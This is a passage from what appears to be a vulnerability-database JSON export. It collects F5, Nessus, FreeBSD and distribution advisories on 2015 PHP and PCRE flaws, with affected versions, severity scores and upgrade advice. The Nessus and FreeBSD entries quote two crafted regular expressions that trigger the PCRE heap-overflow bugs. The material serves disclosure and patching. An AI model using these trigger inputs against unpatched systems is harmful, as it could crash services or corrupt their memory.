"http://support.f5.com/kb/en-us/solutions/public/16000/900/sol16993.html", "cvelist": ["CVE-2006-7243", "CVE-2015-4025", "CVE-2015-4026"], "lastseen": "2016-09-27T21:23:48"}, {"id": "F5:K16826", "type": "f5", "title": "PHP vulnerability CVE-2015-4024", "description": "\nF5 Product Development has assigned ID 525232 (BIG-IP), ID 525232-6 (Enterprise Manager), and ID 528817-6 (BIG-IQ) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H530561 on the **Diagnostics **> **Identified **> **Medium **screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| 12.0.0 \n11.6.1 \n11.5.4| Medium| PHP framework, Control Plane \nBIG-IP AAM| 11.4.0 - 11.6.0| 12.0.0 \n11.6.1 \n11.5.4| Medium| PHP framework, Control Plane \nBIG-IP AFM| 11.3.0 - 11.6.0| 12.0.0 \n11.6.1 \n11.5.4| Medium| PHP framework, Control Plane \nBIG-IP Analytics| 11.0.0 - 11.6.0| 12.0.0 \n11.6.1 \n11.5.4| Medium| PHP framework, Control Plane \nBIG-IP APM| 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| 12.0.0 \n11.6.1 \n11.5.4| Medium| PHP framework, Control Plane \nBIG-IP ASM| 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| 12.0.0 \n11.6.1 \n11.5.4| Medium| PHP framework, Control Plane \nBIG-IP DNS| None| 12.0.0| Not vulnerable| None \nBIG-IP Edge Gateway| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Medium| PHP framework, Control Plane \nBIG-IP GTM| 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| 11.6.1 \n11.5.4| Medium| PHP framework, Control Plane \nBIG-IP Link Controller| 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| 12.0.0 \n11.6.1 \n11.5.4| Medium| PHP framework, Control Plane \nBIG-IP PEM| 11.3.0 - 11.6.0| 12.0.0 \n11.6.1 \n11.5.4| Medium| PHP framework, Control Plane \nBIG-IP PSM| 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4| None| Medium| PHP framework, Control Plane \nBIG-IP WebAccelerator| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Medium| PHP framework, Control Plane \nBIG-IP WOM| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Medium| PHP framework, Control Plane \nARX| None| 6.0.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| 3.0.0 - 3.1.1| None| Medium| PHP framework, Control Plane \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| 4.0.0 - 4.5.0| None| Low| PHP framework, Control Plane \nBIG-IQ Device| 4.2.0 - 4.5.0| None| Low| PHP framework, Control Plane \nBIG-IQ Security| 4.0.0 - 4.5.0| None| Low| PHP framework, Control Plane \nBIG-IQ ADC| 4.5.0| None| Low| PHP framework, Control Plane \nLineRate| None| 2.5.0 - 2.6.0| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1| Not vulnerable| None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the **Severity **values published in the previous table. The **Severity **values and other security vulnerability parameters are defined in [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>).\n\nTo mitigate this vulnerability, F5 recommends that you expose management access only on trusted networks.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 12.x)](<https://support.f5.com/csp/article/K13123>)\n * [K10025: Managing BIG-IP product hotfixes (10.x)](<https://support.f5.com/csp/article/K10025>)\n * [K9502: BIG-IP hotfix matrix](<https://support.f5.com/csp/article/K9502>)\n", "published": "2015-07-02T20:42:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://support.f5.com/csp/article/K16826", "cvelist": ["CVE-2015-4024"], "lastseen": "2017-06-08T00:16:24"}, {"id": "SOL16826", "type": "f5", "title": "SOL16826 - PHP vulnerability CVE-2015-4024", "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the **Severity **values published in the previous table. The **Severity **values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nTo mitigate this vulnerability, F5 recommends that you expose management access only on trusted networks.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x - 12.x)\n * SOL10025: Managing BIG-IP product hotfixes (10.x)\n * SOL9502: BIG-IP hotfix matrix\n", "published": "2015-07-02T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "http://support.f5.com/kb/en-us/solutions/public/16000/800/sol16826.html", "cvelist": ["CVE-2015-4024"], "lastseen": "2016-09-27T21:23:13"}, {"id": "SOL17070", "type": "f5", "title": "SOL17070 - PHP vulnerability CVE-2015-4021", "description": "Recommended Action\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents.\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n", "published": "2015-08-06T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "http://support.f5.com/kb/en-us/solutions/public/17000/000/sol17070.html", "cvelist": ["CVE-2015-4021"], "lastseen": "2016-09-26T17:22:52"}, {"id": "SOL16764", "type": "f5", "title": "SOL16764 - PHP vulnerability CVE-2015-4022", "description": "**Note**: As of February 17, 2015, AskF5 Security Advisory articles include the Severity value. Security Advisory articles published before this date do not list a Severity value.\n\nRecommended Action\n\nNone \n\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x)\n * SOL10025: Managing BIG-IP product hotfixes (10.x)\n * SOL9502: BIG-IP hotfix matrix\n * SOL10322: FirePass hotfix matrix\n * SOL12766: ARX hotfix matrix\n * SOL3430: Installing FirePass hotfixes\n * SOL6664: Obtaining and installing OPSWAT hotfixes\n * SOL10942: Installing OPSWAT hotfixes on BIG-IP APM systems\n", "published": "2015-06-17T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://support.f5.com/kb/en-us/solutions/public/16000/700/sol16764.html", "cvelist": ["CVE-2015-4022"], "lastseen": "2016-03-19T09:01:54"}, {"id": "SOL80285422", "type": "f5", "title": "SOL80285422 - PHP vulnerabilities CVE-2015-4642, CVE-2015-4643, and CVE-2015-4644", "description": "Vulnerability Recommended Actions\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "published": "2016-07-05T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://support.f5.com/kb/en-us/solutions/public/k/80/sol80285422.html", "cvelist": ["CVE-2015-4644", "CVE-2015-1352", "CVE-2015-4642", "CVE-2015-4022", "CVE-2015-4643"], "lastseen": "2016-11-09T00:09:53"}, {"id": "F5:K80285422", "type": "f5", "title": "PHP vulnerabilities CVE-2015-4642, CVE-2015-4643, and CVE-2015-4644", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0 - 12.1.0| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WOM| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nFirePass| None| 7.0.0| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 MobileSafe| None| 1.0.0| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 5.0.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "published": "2016-07-06T01:25:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://support.f5.com/csp/article/K80285422", "cvelist": ["CVE-2015-4644", "CVE-2015-1352", "CVE-2015-4642", "CVE-2015-4022", "CVE-2015-4643"], "lastseen": "2017-06-08T00:16:21"}], "nessus": [{"id": "F5_BIGIP_SOL16983.NASL", "type": "nessus", "title": "F5 Networks BIG-IP : PCRE library vulnerability (K16983)", "description": "PCRE library is prone to a heap overflow vulnerability. Due to insufficient bounds checking inside compile_branch(), the heap memory could be overflowed via a crafted regular expression. Since PCRE library is widely used, this vulnerability should affect many applications using it. An attacker may exploit this issue to execute arbitrary code in the context of the user running the affected application. (CVE-2015-2325)", "published": "2016-06-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=91579", "cvelist": ["CVE-2015-2325"], "lastseen": "2017-10-29T13:43:54"}, {"id": "FREEBSD_PKG_4A88E3ED00D311E5A072D050996490D0.NASL", "type": "nessus", "title": "FreeBSD : pcre -- multiple vulnerabilities (4a88e3ed-00d3-11e5-a072-d050996490d0)", "description": "PCRE development team reports :\n\nA pattern such as '((?2){0,1999}())?', which has a group containing a forward reference repeated a large (but limited) number of times within a repeated outer group that has a zero minimum quantifier, caused incorrect code to be compiled, leading to the error 'internal error: previously-checked referenced subpattern not found' when an incorrect memory address was read. This bug was reported as 'heap overflow', discovered by Kai Lu of Fortinet's FortiGuard Labs and given the CVE number CVE-2015-2325.\n\nA pattern such as '((?+1)(\\1))/' containing a forward reference subroutine call within a group that also contained a recursive back reference caused incorrect code to be compiled. This bug was reported as 'heap overflow', discovered by Kai Lu of Fortinet's FortiGuard Labs, and given the CVE number CVE-2015-2326.", "published": "2015-05-26T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=83795", "cvelist": ["CVE-2015-2325", "CVE-2015-2326"], "lastseen": "2017-10-29T13:45:04"}, {"id": "OPENSUSE-2015-353.NASL", "type": "nessus", "title": "openSUSE Security Update : pcre (openSUSE-2015-353)", "description": "The regular expression library pcre was updated to 8.37 to fix three security issues and a number of bugs and correctness issues.\n\nThe following vulnerabilities were fixed :\n\n - CVE-2015-2325: Specially crafted regular expressions could have caused a heap buffer overlow in compile_branch(), potentially allowing the execution of arbitrary code. (boo#924960)\n\n - CVE-2015-2326: Specially crafted regular expressions could have caused a heap buffer overlow in pcre_compile2(), potentially allowing the execution of arbitrary code. [boo#924961]\n\n - CVE-2014-8964: Specially crafted regular expression could have caused a denial of service (crash) or have other unspecified impact. [boo#906574]", "published": "2015-05-13T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=83392", "cvelist": ["CVE-2015-2325", "CVE-2014-8964", "CVE-2015-2326"], "lastseen": "2017-10-29T13:40:05"}, {"id": "SECURITYCENTER_PHP_5_4_41.NASL", "type": "nessus", "title": "Tenable SecurityCenter Multiple PHP Vulnerabilities (TNS-2015-06)", "description": "The SecurityCenter application installed on the remote host is affected by multiple vulnerabilities in the bundled version of PHP that is prior to version 5.4.41. It is, therefore, affected by the following vulnerabilities :\n\n - Multiple flaws exist related to using pathnames containing NULL bytes. A remote attacker can exploit these flaws, by combining the '\\0' character with a safe file extension, to bypass access restrictions. This had been previously fixed but was reintroduced by a regression in versions 5.4+. (CVE-2006-7243, CVE-2015-4025)\n\n - Multiple heap buffer overflow conditions exist in the bundled Perl-Compatible Regular Expression (PCRE) library due to improper validation of user-supplied input to the compile_branch() and pcre_compile2() functions. A remote attacker can exploit these conditions to cause a heap-based buffer overflow, resulting in a denial of service condition or the execution of arbitrary code. (CVE-2015-2325, CVE-2015-2326)\n\n - A flaw exists in the multipart_buffer_headers() function in rfc1867.c due to improper handling of multipart/form-data in HTTP requests. A remote attacker can exploit this flaw to cause a consumption of CPU resources, resulting in a denial of service condition.\n (CVE-2015-4024)", "published": "2015-08-20T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=85566", "cvelist": ["CVE-2015-2325", "CVE-2006-7243", "CVE-2015-4025", "CVE-2015-4024", "CVE-2015-2326"], "lastseen": "2018-02-15T07:04:53"}, {"id": "UBUNTU_USN-2694-1.NASL", "type": "nessus", "title": "Ubuntu 12.04 LTS / 14.04 LTS / 15.04 : pcre3 vulnerabilities (USN-2694-1)", "description": "Michele Spagnuolo discovered that PCRE incorrectly handled certain regular expressions. A remote attacker could use this issue to cause applications using PCRE to crash, resulting in a denial of service, or possibly execute arbitrary code. This issue only affected Ubuntu 14.04 LTS. (CVE-2014-8964)\n\nKai Lu discovered that PCRE incorrectly handled certain regular expressions. A remote attacker could use this issue to cause applications using PCRE to crash, resulting in a denial of service, or possibly execute arbitrary code. This issue only affected Ubuntu 14.04 LTS and Ubuntu 15.04. (CVE-2015-2325, CVE-2015-2326)\n\nWen Guanxing discovered that PCRE incorrectly handled certain regular expressions. A remote attacker could use this issue to cause applications using PCRE to crash, resulting in a denial of service, or possibly execute arbitrary code. This issue only affected Ubuntu 15.04. (CVE-2015-3210)\n\nIt was discovered that PCRE incorrectly handled certain regular expressions. A remote attacker could use this issue to cause applications using PCRE to crash, resulting in a denial of service, or possibly execute arbitrary code. This issue only affected Ubuntu 12.04 LTS and 14.04 LTS. (CVE-2015-5073).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "published": "2015-07-30T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=85122", "cvelist": ["CVE-2015-3210", "CVE-2015-2325", "CVE-2014-8964", "CVE-2015-5073", "CVE-2015-2326"], "lastseen": "2017-10-29T13:41:40"}, {"id": "PHP_5_5_26.NASL", "type": "nessus", "title": "PHP 5.5.x < 5.5.26 Multiple Vulnerabilities", "description": "According to its banner, the version of PHP 5.5.x running on the remote web server is prior to 5.5.26. It is, therefore, affected by multiple vulnerabilities : \n\n - Multiple heap buffer overflow conditions exist in the bundled Perl-Compatible Regular Expression (PCRE) library due to improper validation of user-supplied input to the compile_branch() and pcre_compile2() functions. A remote attacker can exploit these conditions to cause a heap-based buffer overflow, resulting in a denial of service condition or the execution of arbitrary code. (CVE-2015-2325, CVE-2015-2326)\n\n - A denial of service vulnerability exists in the bundled SQLite component due to improper handling of quotes in collation sequence names. A remote attacker can exploit this to cause uninitialized memory access, resulting in denial of service condition.\n (CVE-2015-3414)\n\n - A denial of service vulnerability exists in the bundled SQLite component due to an improper implementation of comparison operators in the sqlite3VdbeExec() function in vdbe.c. A remote attacker can exploit this to cause an invalid free operation, resulting in a denial of service condition. (CVE-2015-3415)\n\n - A denial of service vulnerability exists in the bundled SQLite component due to improper handling of precision and width values during floating-point conversions in the sqlite3VXPrintf() function in printf.c. A remote attacker can exploit this to cause a stack-based buffer overflow, resulting in a denial of service condition or the execution of arbitrary code. (CVE-2015-3416)\n\n - A security bypass vulnerability exists due to a failure in multiple extensions to check for NULL bytes in a path when processing or reading a file. A remote attacker can exploit this, by combining the '\\0' character with a safe file extension, to bypass access restrictions.\n (CVE-2015-4598)\n\n - An arbitrary command injection vulnerability exists due to a flaw in the php_escape_shell_arg() function in exec.c. A remote attacker can exploit this, via the escapeshellarg() PHP method, to inject arbitrary operating system commands. (CVE-2015-4642)\n\n - A heap buffer overflow condition exists in the ftp_genlist() function in ftp.c. due to improper validation of user-supplied input. A remote attacker can exploit this to cause a denial of service condition or the execution of arbitrary code. (CVE-2015-4643) \n - A denial of service vulnerability exists due to a NULL pointer dereference flaw in the build_tablename() function in pgsql.c. An authenticated, remote attacker can exploit this to cause an application crash.\n (CVE-2015-4644)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "published": "2015-06-24T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=84363", "cvelist": ["CVE-2015-3415", "CVE-2015-2325", "CVE-2015-4644", "CVE-2015-4642", "CVE-2015-3416", "CVE-2015-3414", "CVE-2015-4598", "CVE-2015-4643", "CVE-2015-2326"], "lastseen": "2018-05-22T02:39:38"}, {"id": "PHP_5_4_42.NASL", "type": "nessus", "title": "PHP 5.4.x < 5.4.42 Multiple Vulnerabilities", "description": "According to its banner, the version of PHP 5.4.x running on the remote web server is prior to 5.4.42. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple heap buffer overflow conditions exist in the bundled Perl-Compatible Regular Expression (PCRE) library due to improper validation of user-supplied input to the compile_branch() and pcre_compile2() functions. A remote attacker can exploit these conditions to cause a heap-based buffer overflow, resulting in a denial of service condition or the execution of arbitrary code. (CVE-2015-2325, CVE-2015-2326)\n\n - A denial of service vulnerability exists in the bundled SQLite component due to improper handling of quotes in collation sequence names. A remote attacker can exploit this to cause uninitialized memory access, resulting in denial of service condition.\n (CVE-2015-3414)\n\n - A denial of service vulnerability exists in the bundled SQLite component due to an improper implementation of comparison operators in the sqlite3VdbeExec() function in vdbe.c. A remote attacker can exploit this to cause an invalid free operation, resulting in a denial of service condition. (CVE-2015-3415)\n\n - A denial of service vulnerability exists in the bundled SQLite component due to improper handling of precision and width values during floating-point conversions in the sqlite3VXPrintf() function in printf.c. A remote attacker can exploit this to cause a stack-based buffer overflow, resulting in a denial of service condition or the execution of arbitrary code. (CVE-2015-3416)\n\n - A security bypass vulnerability exists due to a failure in multiple extensions to check for NULL bytes in a path when processing or reading a file. A remote attacker can exploit this, by combining the '\\0' character with a safe file extension, to bypass access restrictions.\n (CVE-2015-4598)\n\n - An arbitrary command injection vulnerability exists due to a flaw in the php_escape_shell_arg() function in exec.c. A remote attacker can exploit this, via the escapeshellarg() PHP method, to inject arbitrary operating system commands. (CVE-2015-4642)\n\n - A heap buffer overflow condition exists in the ftp_genlist() function in ftp.c. due to improper validation of user-supplied input. A remote attacker can exploit this to cause a denial of service condition or the execution of arbitrary code. (CVE-2015-4643) \n - A denial of service vulnerability exists due to a NULL pointer dereference flaw in the build_tablename() function in pgsql.c. An authenticated, remote attacker can exploit this to cause an application crash.\n (CVE-2015-4644)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "published": "2015-06-24T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=84362", "cvelist": ["CVE-2015-3415", "CVE-2015-2325", "CVE-2015-4644", "CVE-2015-4642", "CVE-2015-3416", "CVE-2015-3414", "CVE-2015-4598", "CVE-2015-4643", "CVE-2015-2326"], "lastseen": "2017-10-29T13:33:10"}, {"id": "ALA_ALAS-2015-563.NASL", "type": "nessus", "title": "Amazon Linux AMI : php56 (ALAS-2015-563)", "description": "Upstream reports that several bugs have been fixed as well as several security issues into some bundled libraries (CVE-2015-3414 , CVE-2015-3415 , CVE-2015-3416 , CVE-2015-2325 and CVE-2015-2326). All PHP 5.6 users are encouraged to upgrade to this version. Please see the upstream release notes for full details.", "published": "2015-07-09T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=84625", "cvelist": ["CVE-2015-3415", "CVE-2015-2325", "CVE-2015-4644", "CVE-2014-3416", "CVE-2015-4642", "CVE-2015-3414", "CVE-2015-4643", "CVE-2015-2326"], "lastseen": "2018-04-19T08:06:02"}, {"id": "PHP_5_6_10.NASL", "type": "nessus", "title": "PHP 5.6.x < 5.6.10 Multiple Vulnerabilities", "description": "According to its banner, the version of PHP 5.6.x running on the remote web server is prior to 5.6.10. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple heap buffer overflow conditions exist in the bundled Perl-Compatible Regular Expression (PCRE) library due to improper validation of user-supplied input to the compile_branch() and pcre_compile2() functions. A remote attacker can exploit these conditions to cause a heap-based buffer overflow, resulting in a denial of service condition or the execution of arbitrary code. (CVE-2015-2325, CVE-2015-2326)\n\n - A denial of service vulnerability exists in the bundled SQLite component due to improper handling of quotes in collation sequence names. A remote attacker can exploit this to cause uninitialized memory access, resulting in denial of service condition.\n (CVE-2015-3414)\n\n - A denial of service vulnerability exists in the bundled SQLite component due to an improper implementation of comparison operators in the sqlite3VdbeExec() function in vdbe.c. A remote attacker can exploit this to cause an invalid free operation, resulting in a denial of service condition. (CVE-2015-3415)\n\n - A denial of service vulnerability exists in the bundled SQLite component due to improper handling of precision and width values during floating-point conversions in the sqlite3VXPrintf() function in printf.c. A remote attacker can exploit this to cause a stack-based buffer overflow, resulting in a denial of service condition or the execution of arbitrary code. (CVE-2015-3416)\n\n - A security bypass vulnerability exists due to a failure in multiple extensions to check for NULL bytes in a path when processing or reading a file. A remote attacker can exploit this, by combining the '\\0' character with a safe file extension, to bypass access restrictions.\n (CVE-2015-4598)\n\n - An arbitrary command injection vulnerability exists due to a flaw in the php_escape_shell_arg() function in exec.c. A remote attacker can exploit this, via the escapeshellarg() PHP method, to inject arbitrary operating system commands. (CVE-2015-4642)\n\n - A heap buffer overflow condition exists in the ftp_genlist() function in ftp.c. due to improper validation of user-supplied input. A remote attacker can exploit this to cause a denial of service condition or the execution of arbitrary code. (CVE-2015-4643) \n - A denial of service vulnerability exists due to a NULL pointer dereference flaw in the build_tablename() function in pgsql.c. An authenticated, remote attacker can exploit this to cause an application crash.\n (CVE-2015-4644)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "published": "2015-06-24T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=84364", "cvelist": ["CVE-2015-3415", "CVE-2015-2325", "CVE-2015-4644", "CVE-2015-4642", "CVE-2015-3416", "CVE-2015-3414", "CVE-2015-4598", "CVE-2015-4643", "CVE-2015-2326"], "lastseen": "2017-10-29T13:40:56"}, {"id": "ALA_ALAS-2015-536.NASL", "type": "nessus", "title": "Amazon Linux AMI : php56 (ALAS-2015-536)", "description": "An integer underflow flaw leading to out-of-bounds memory access was found in the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened. (CVE-2015-4021)\n\nAn integer overflow flaw leading to a heap based buffer overflow was found in the way PHP's FTP extension parsed file listing FTP server responses. A malicious FTP server could use this flaw to cause a PHP application to crash or, possibly, execute arbitrary code.\n(CVE-2015-4022)\n\nA flaw was found in the way PHP parsed multipart HTTP POST requests. A specially crafted request could cause PHP to use an excessive amount of CPU time. (CVE-2015-4024)\n\nIt was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions. (CVE-2015-4025)\n\nIt was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions. (CVE-2015-4026)\n\nPCRE library is prone to a heap overflow vulnerability. Due to insufficient bounds checking inside compile_branch(), the heap memory could be overflowed via a crafted regular expression. Since PCRE library is widely used, this vulnerability should affect many applications using it. An attacker may exploit this issue to execute arbitrary code in the context of the user running the affected application. (CVE-2015-2325)\n\nPCRE library is prone to a vulnerability which leads to Heap overflow.\nWithout enough bound checking inside pcre_compile2(), the heap memory could be overflowed via a crafted regular expression. Since PCRE library is widely used, this vulnerability should affect many applications. An attacker may exploit this issue to execute arbitrary code in the context of the user running the affected application.\n(CVE-2015-2326)", "published": "2015-06-04T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=83975", "cvelist": ["CVE-2015-2325", "CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4026", "CVE-2015-4022", "CVE-2015-2326"], "lastseen": "2018-04-19T07:28:26"}], "freebsd": [{"id": "4A88E3ED-00D3-11E5-A072-D050996490D0", "type": "freebsd", "title": "pcre -- multiple vulnerabilities", "description": "\nPCRE development team reports:\n\nA pattern such as \"((?2){0,1999}())?\", which has a group\n\t containing a forward reference repeated a large (but limited)\n\t number of times within a repeated outer group that has a zero\n\t minimum quantifier, caused incorrect code to be compiled,\n\t leading to the error \"internal error: previously-checked\n\t referenced subpattern not found\" when an incorrect memory\n\t address was read. This bug was reported as \"heap overflow\",\n\t discovered by Kai Lu of Fortinet's 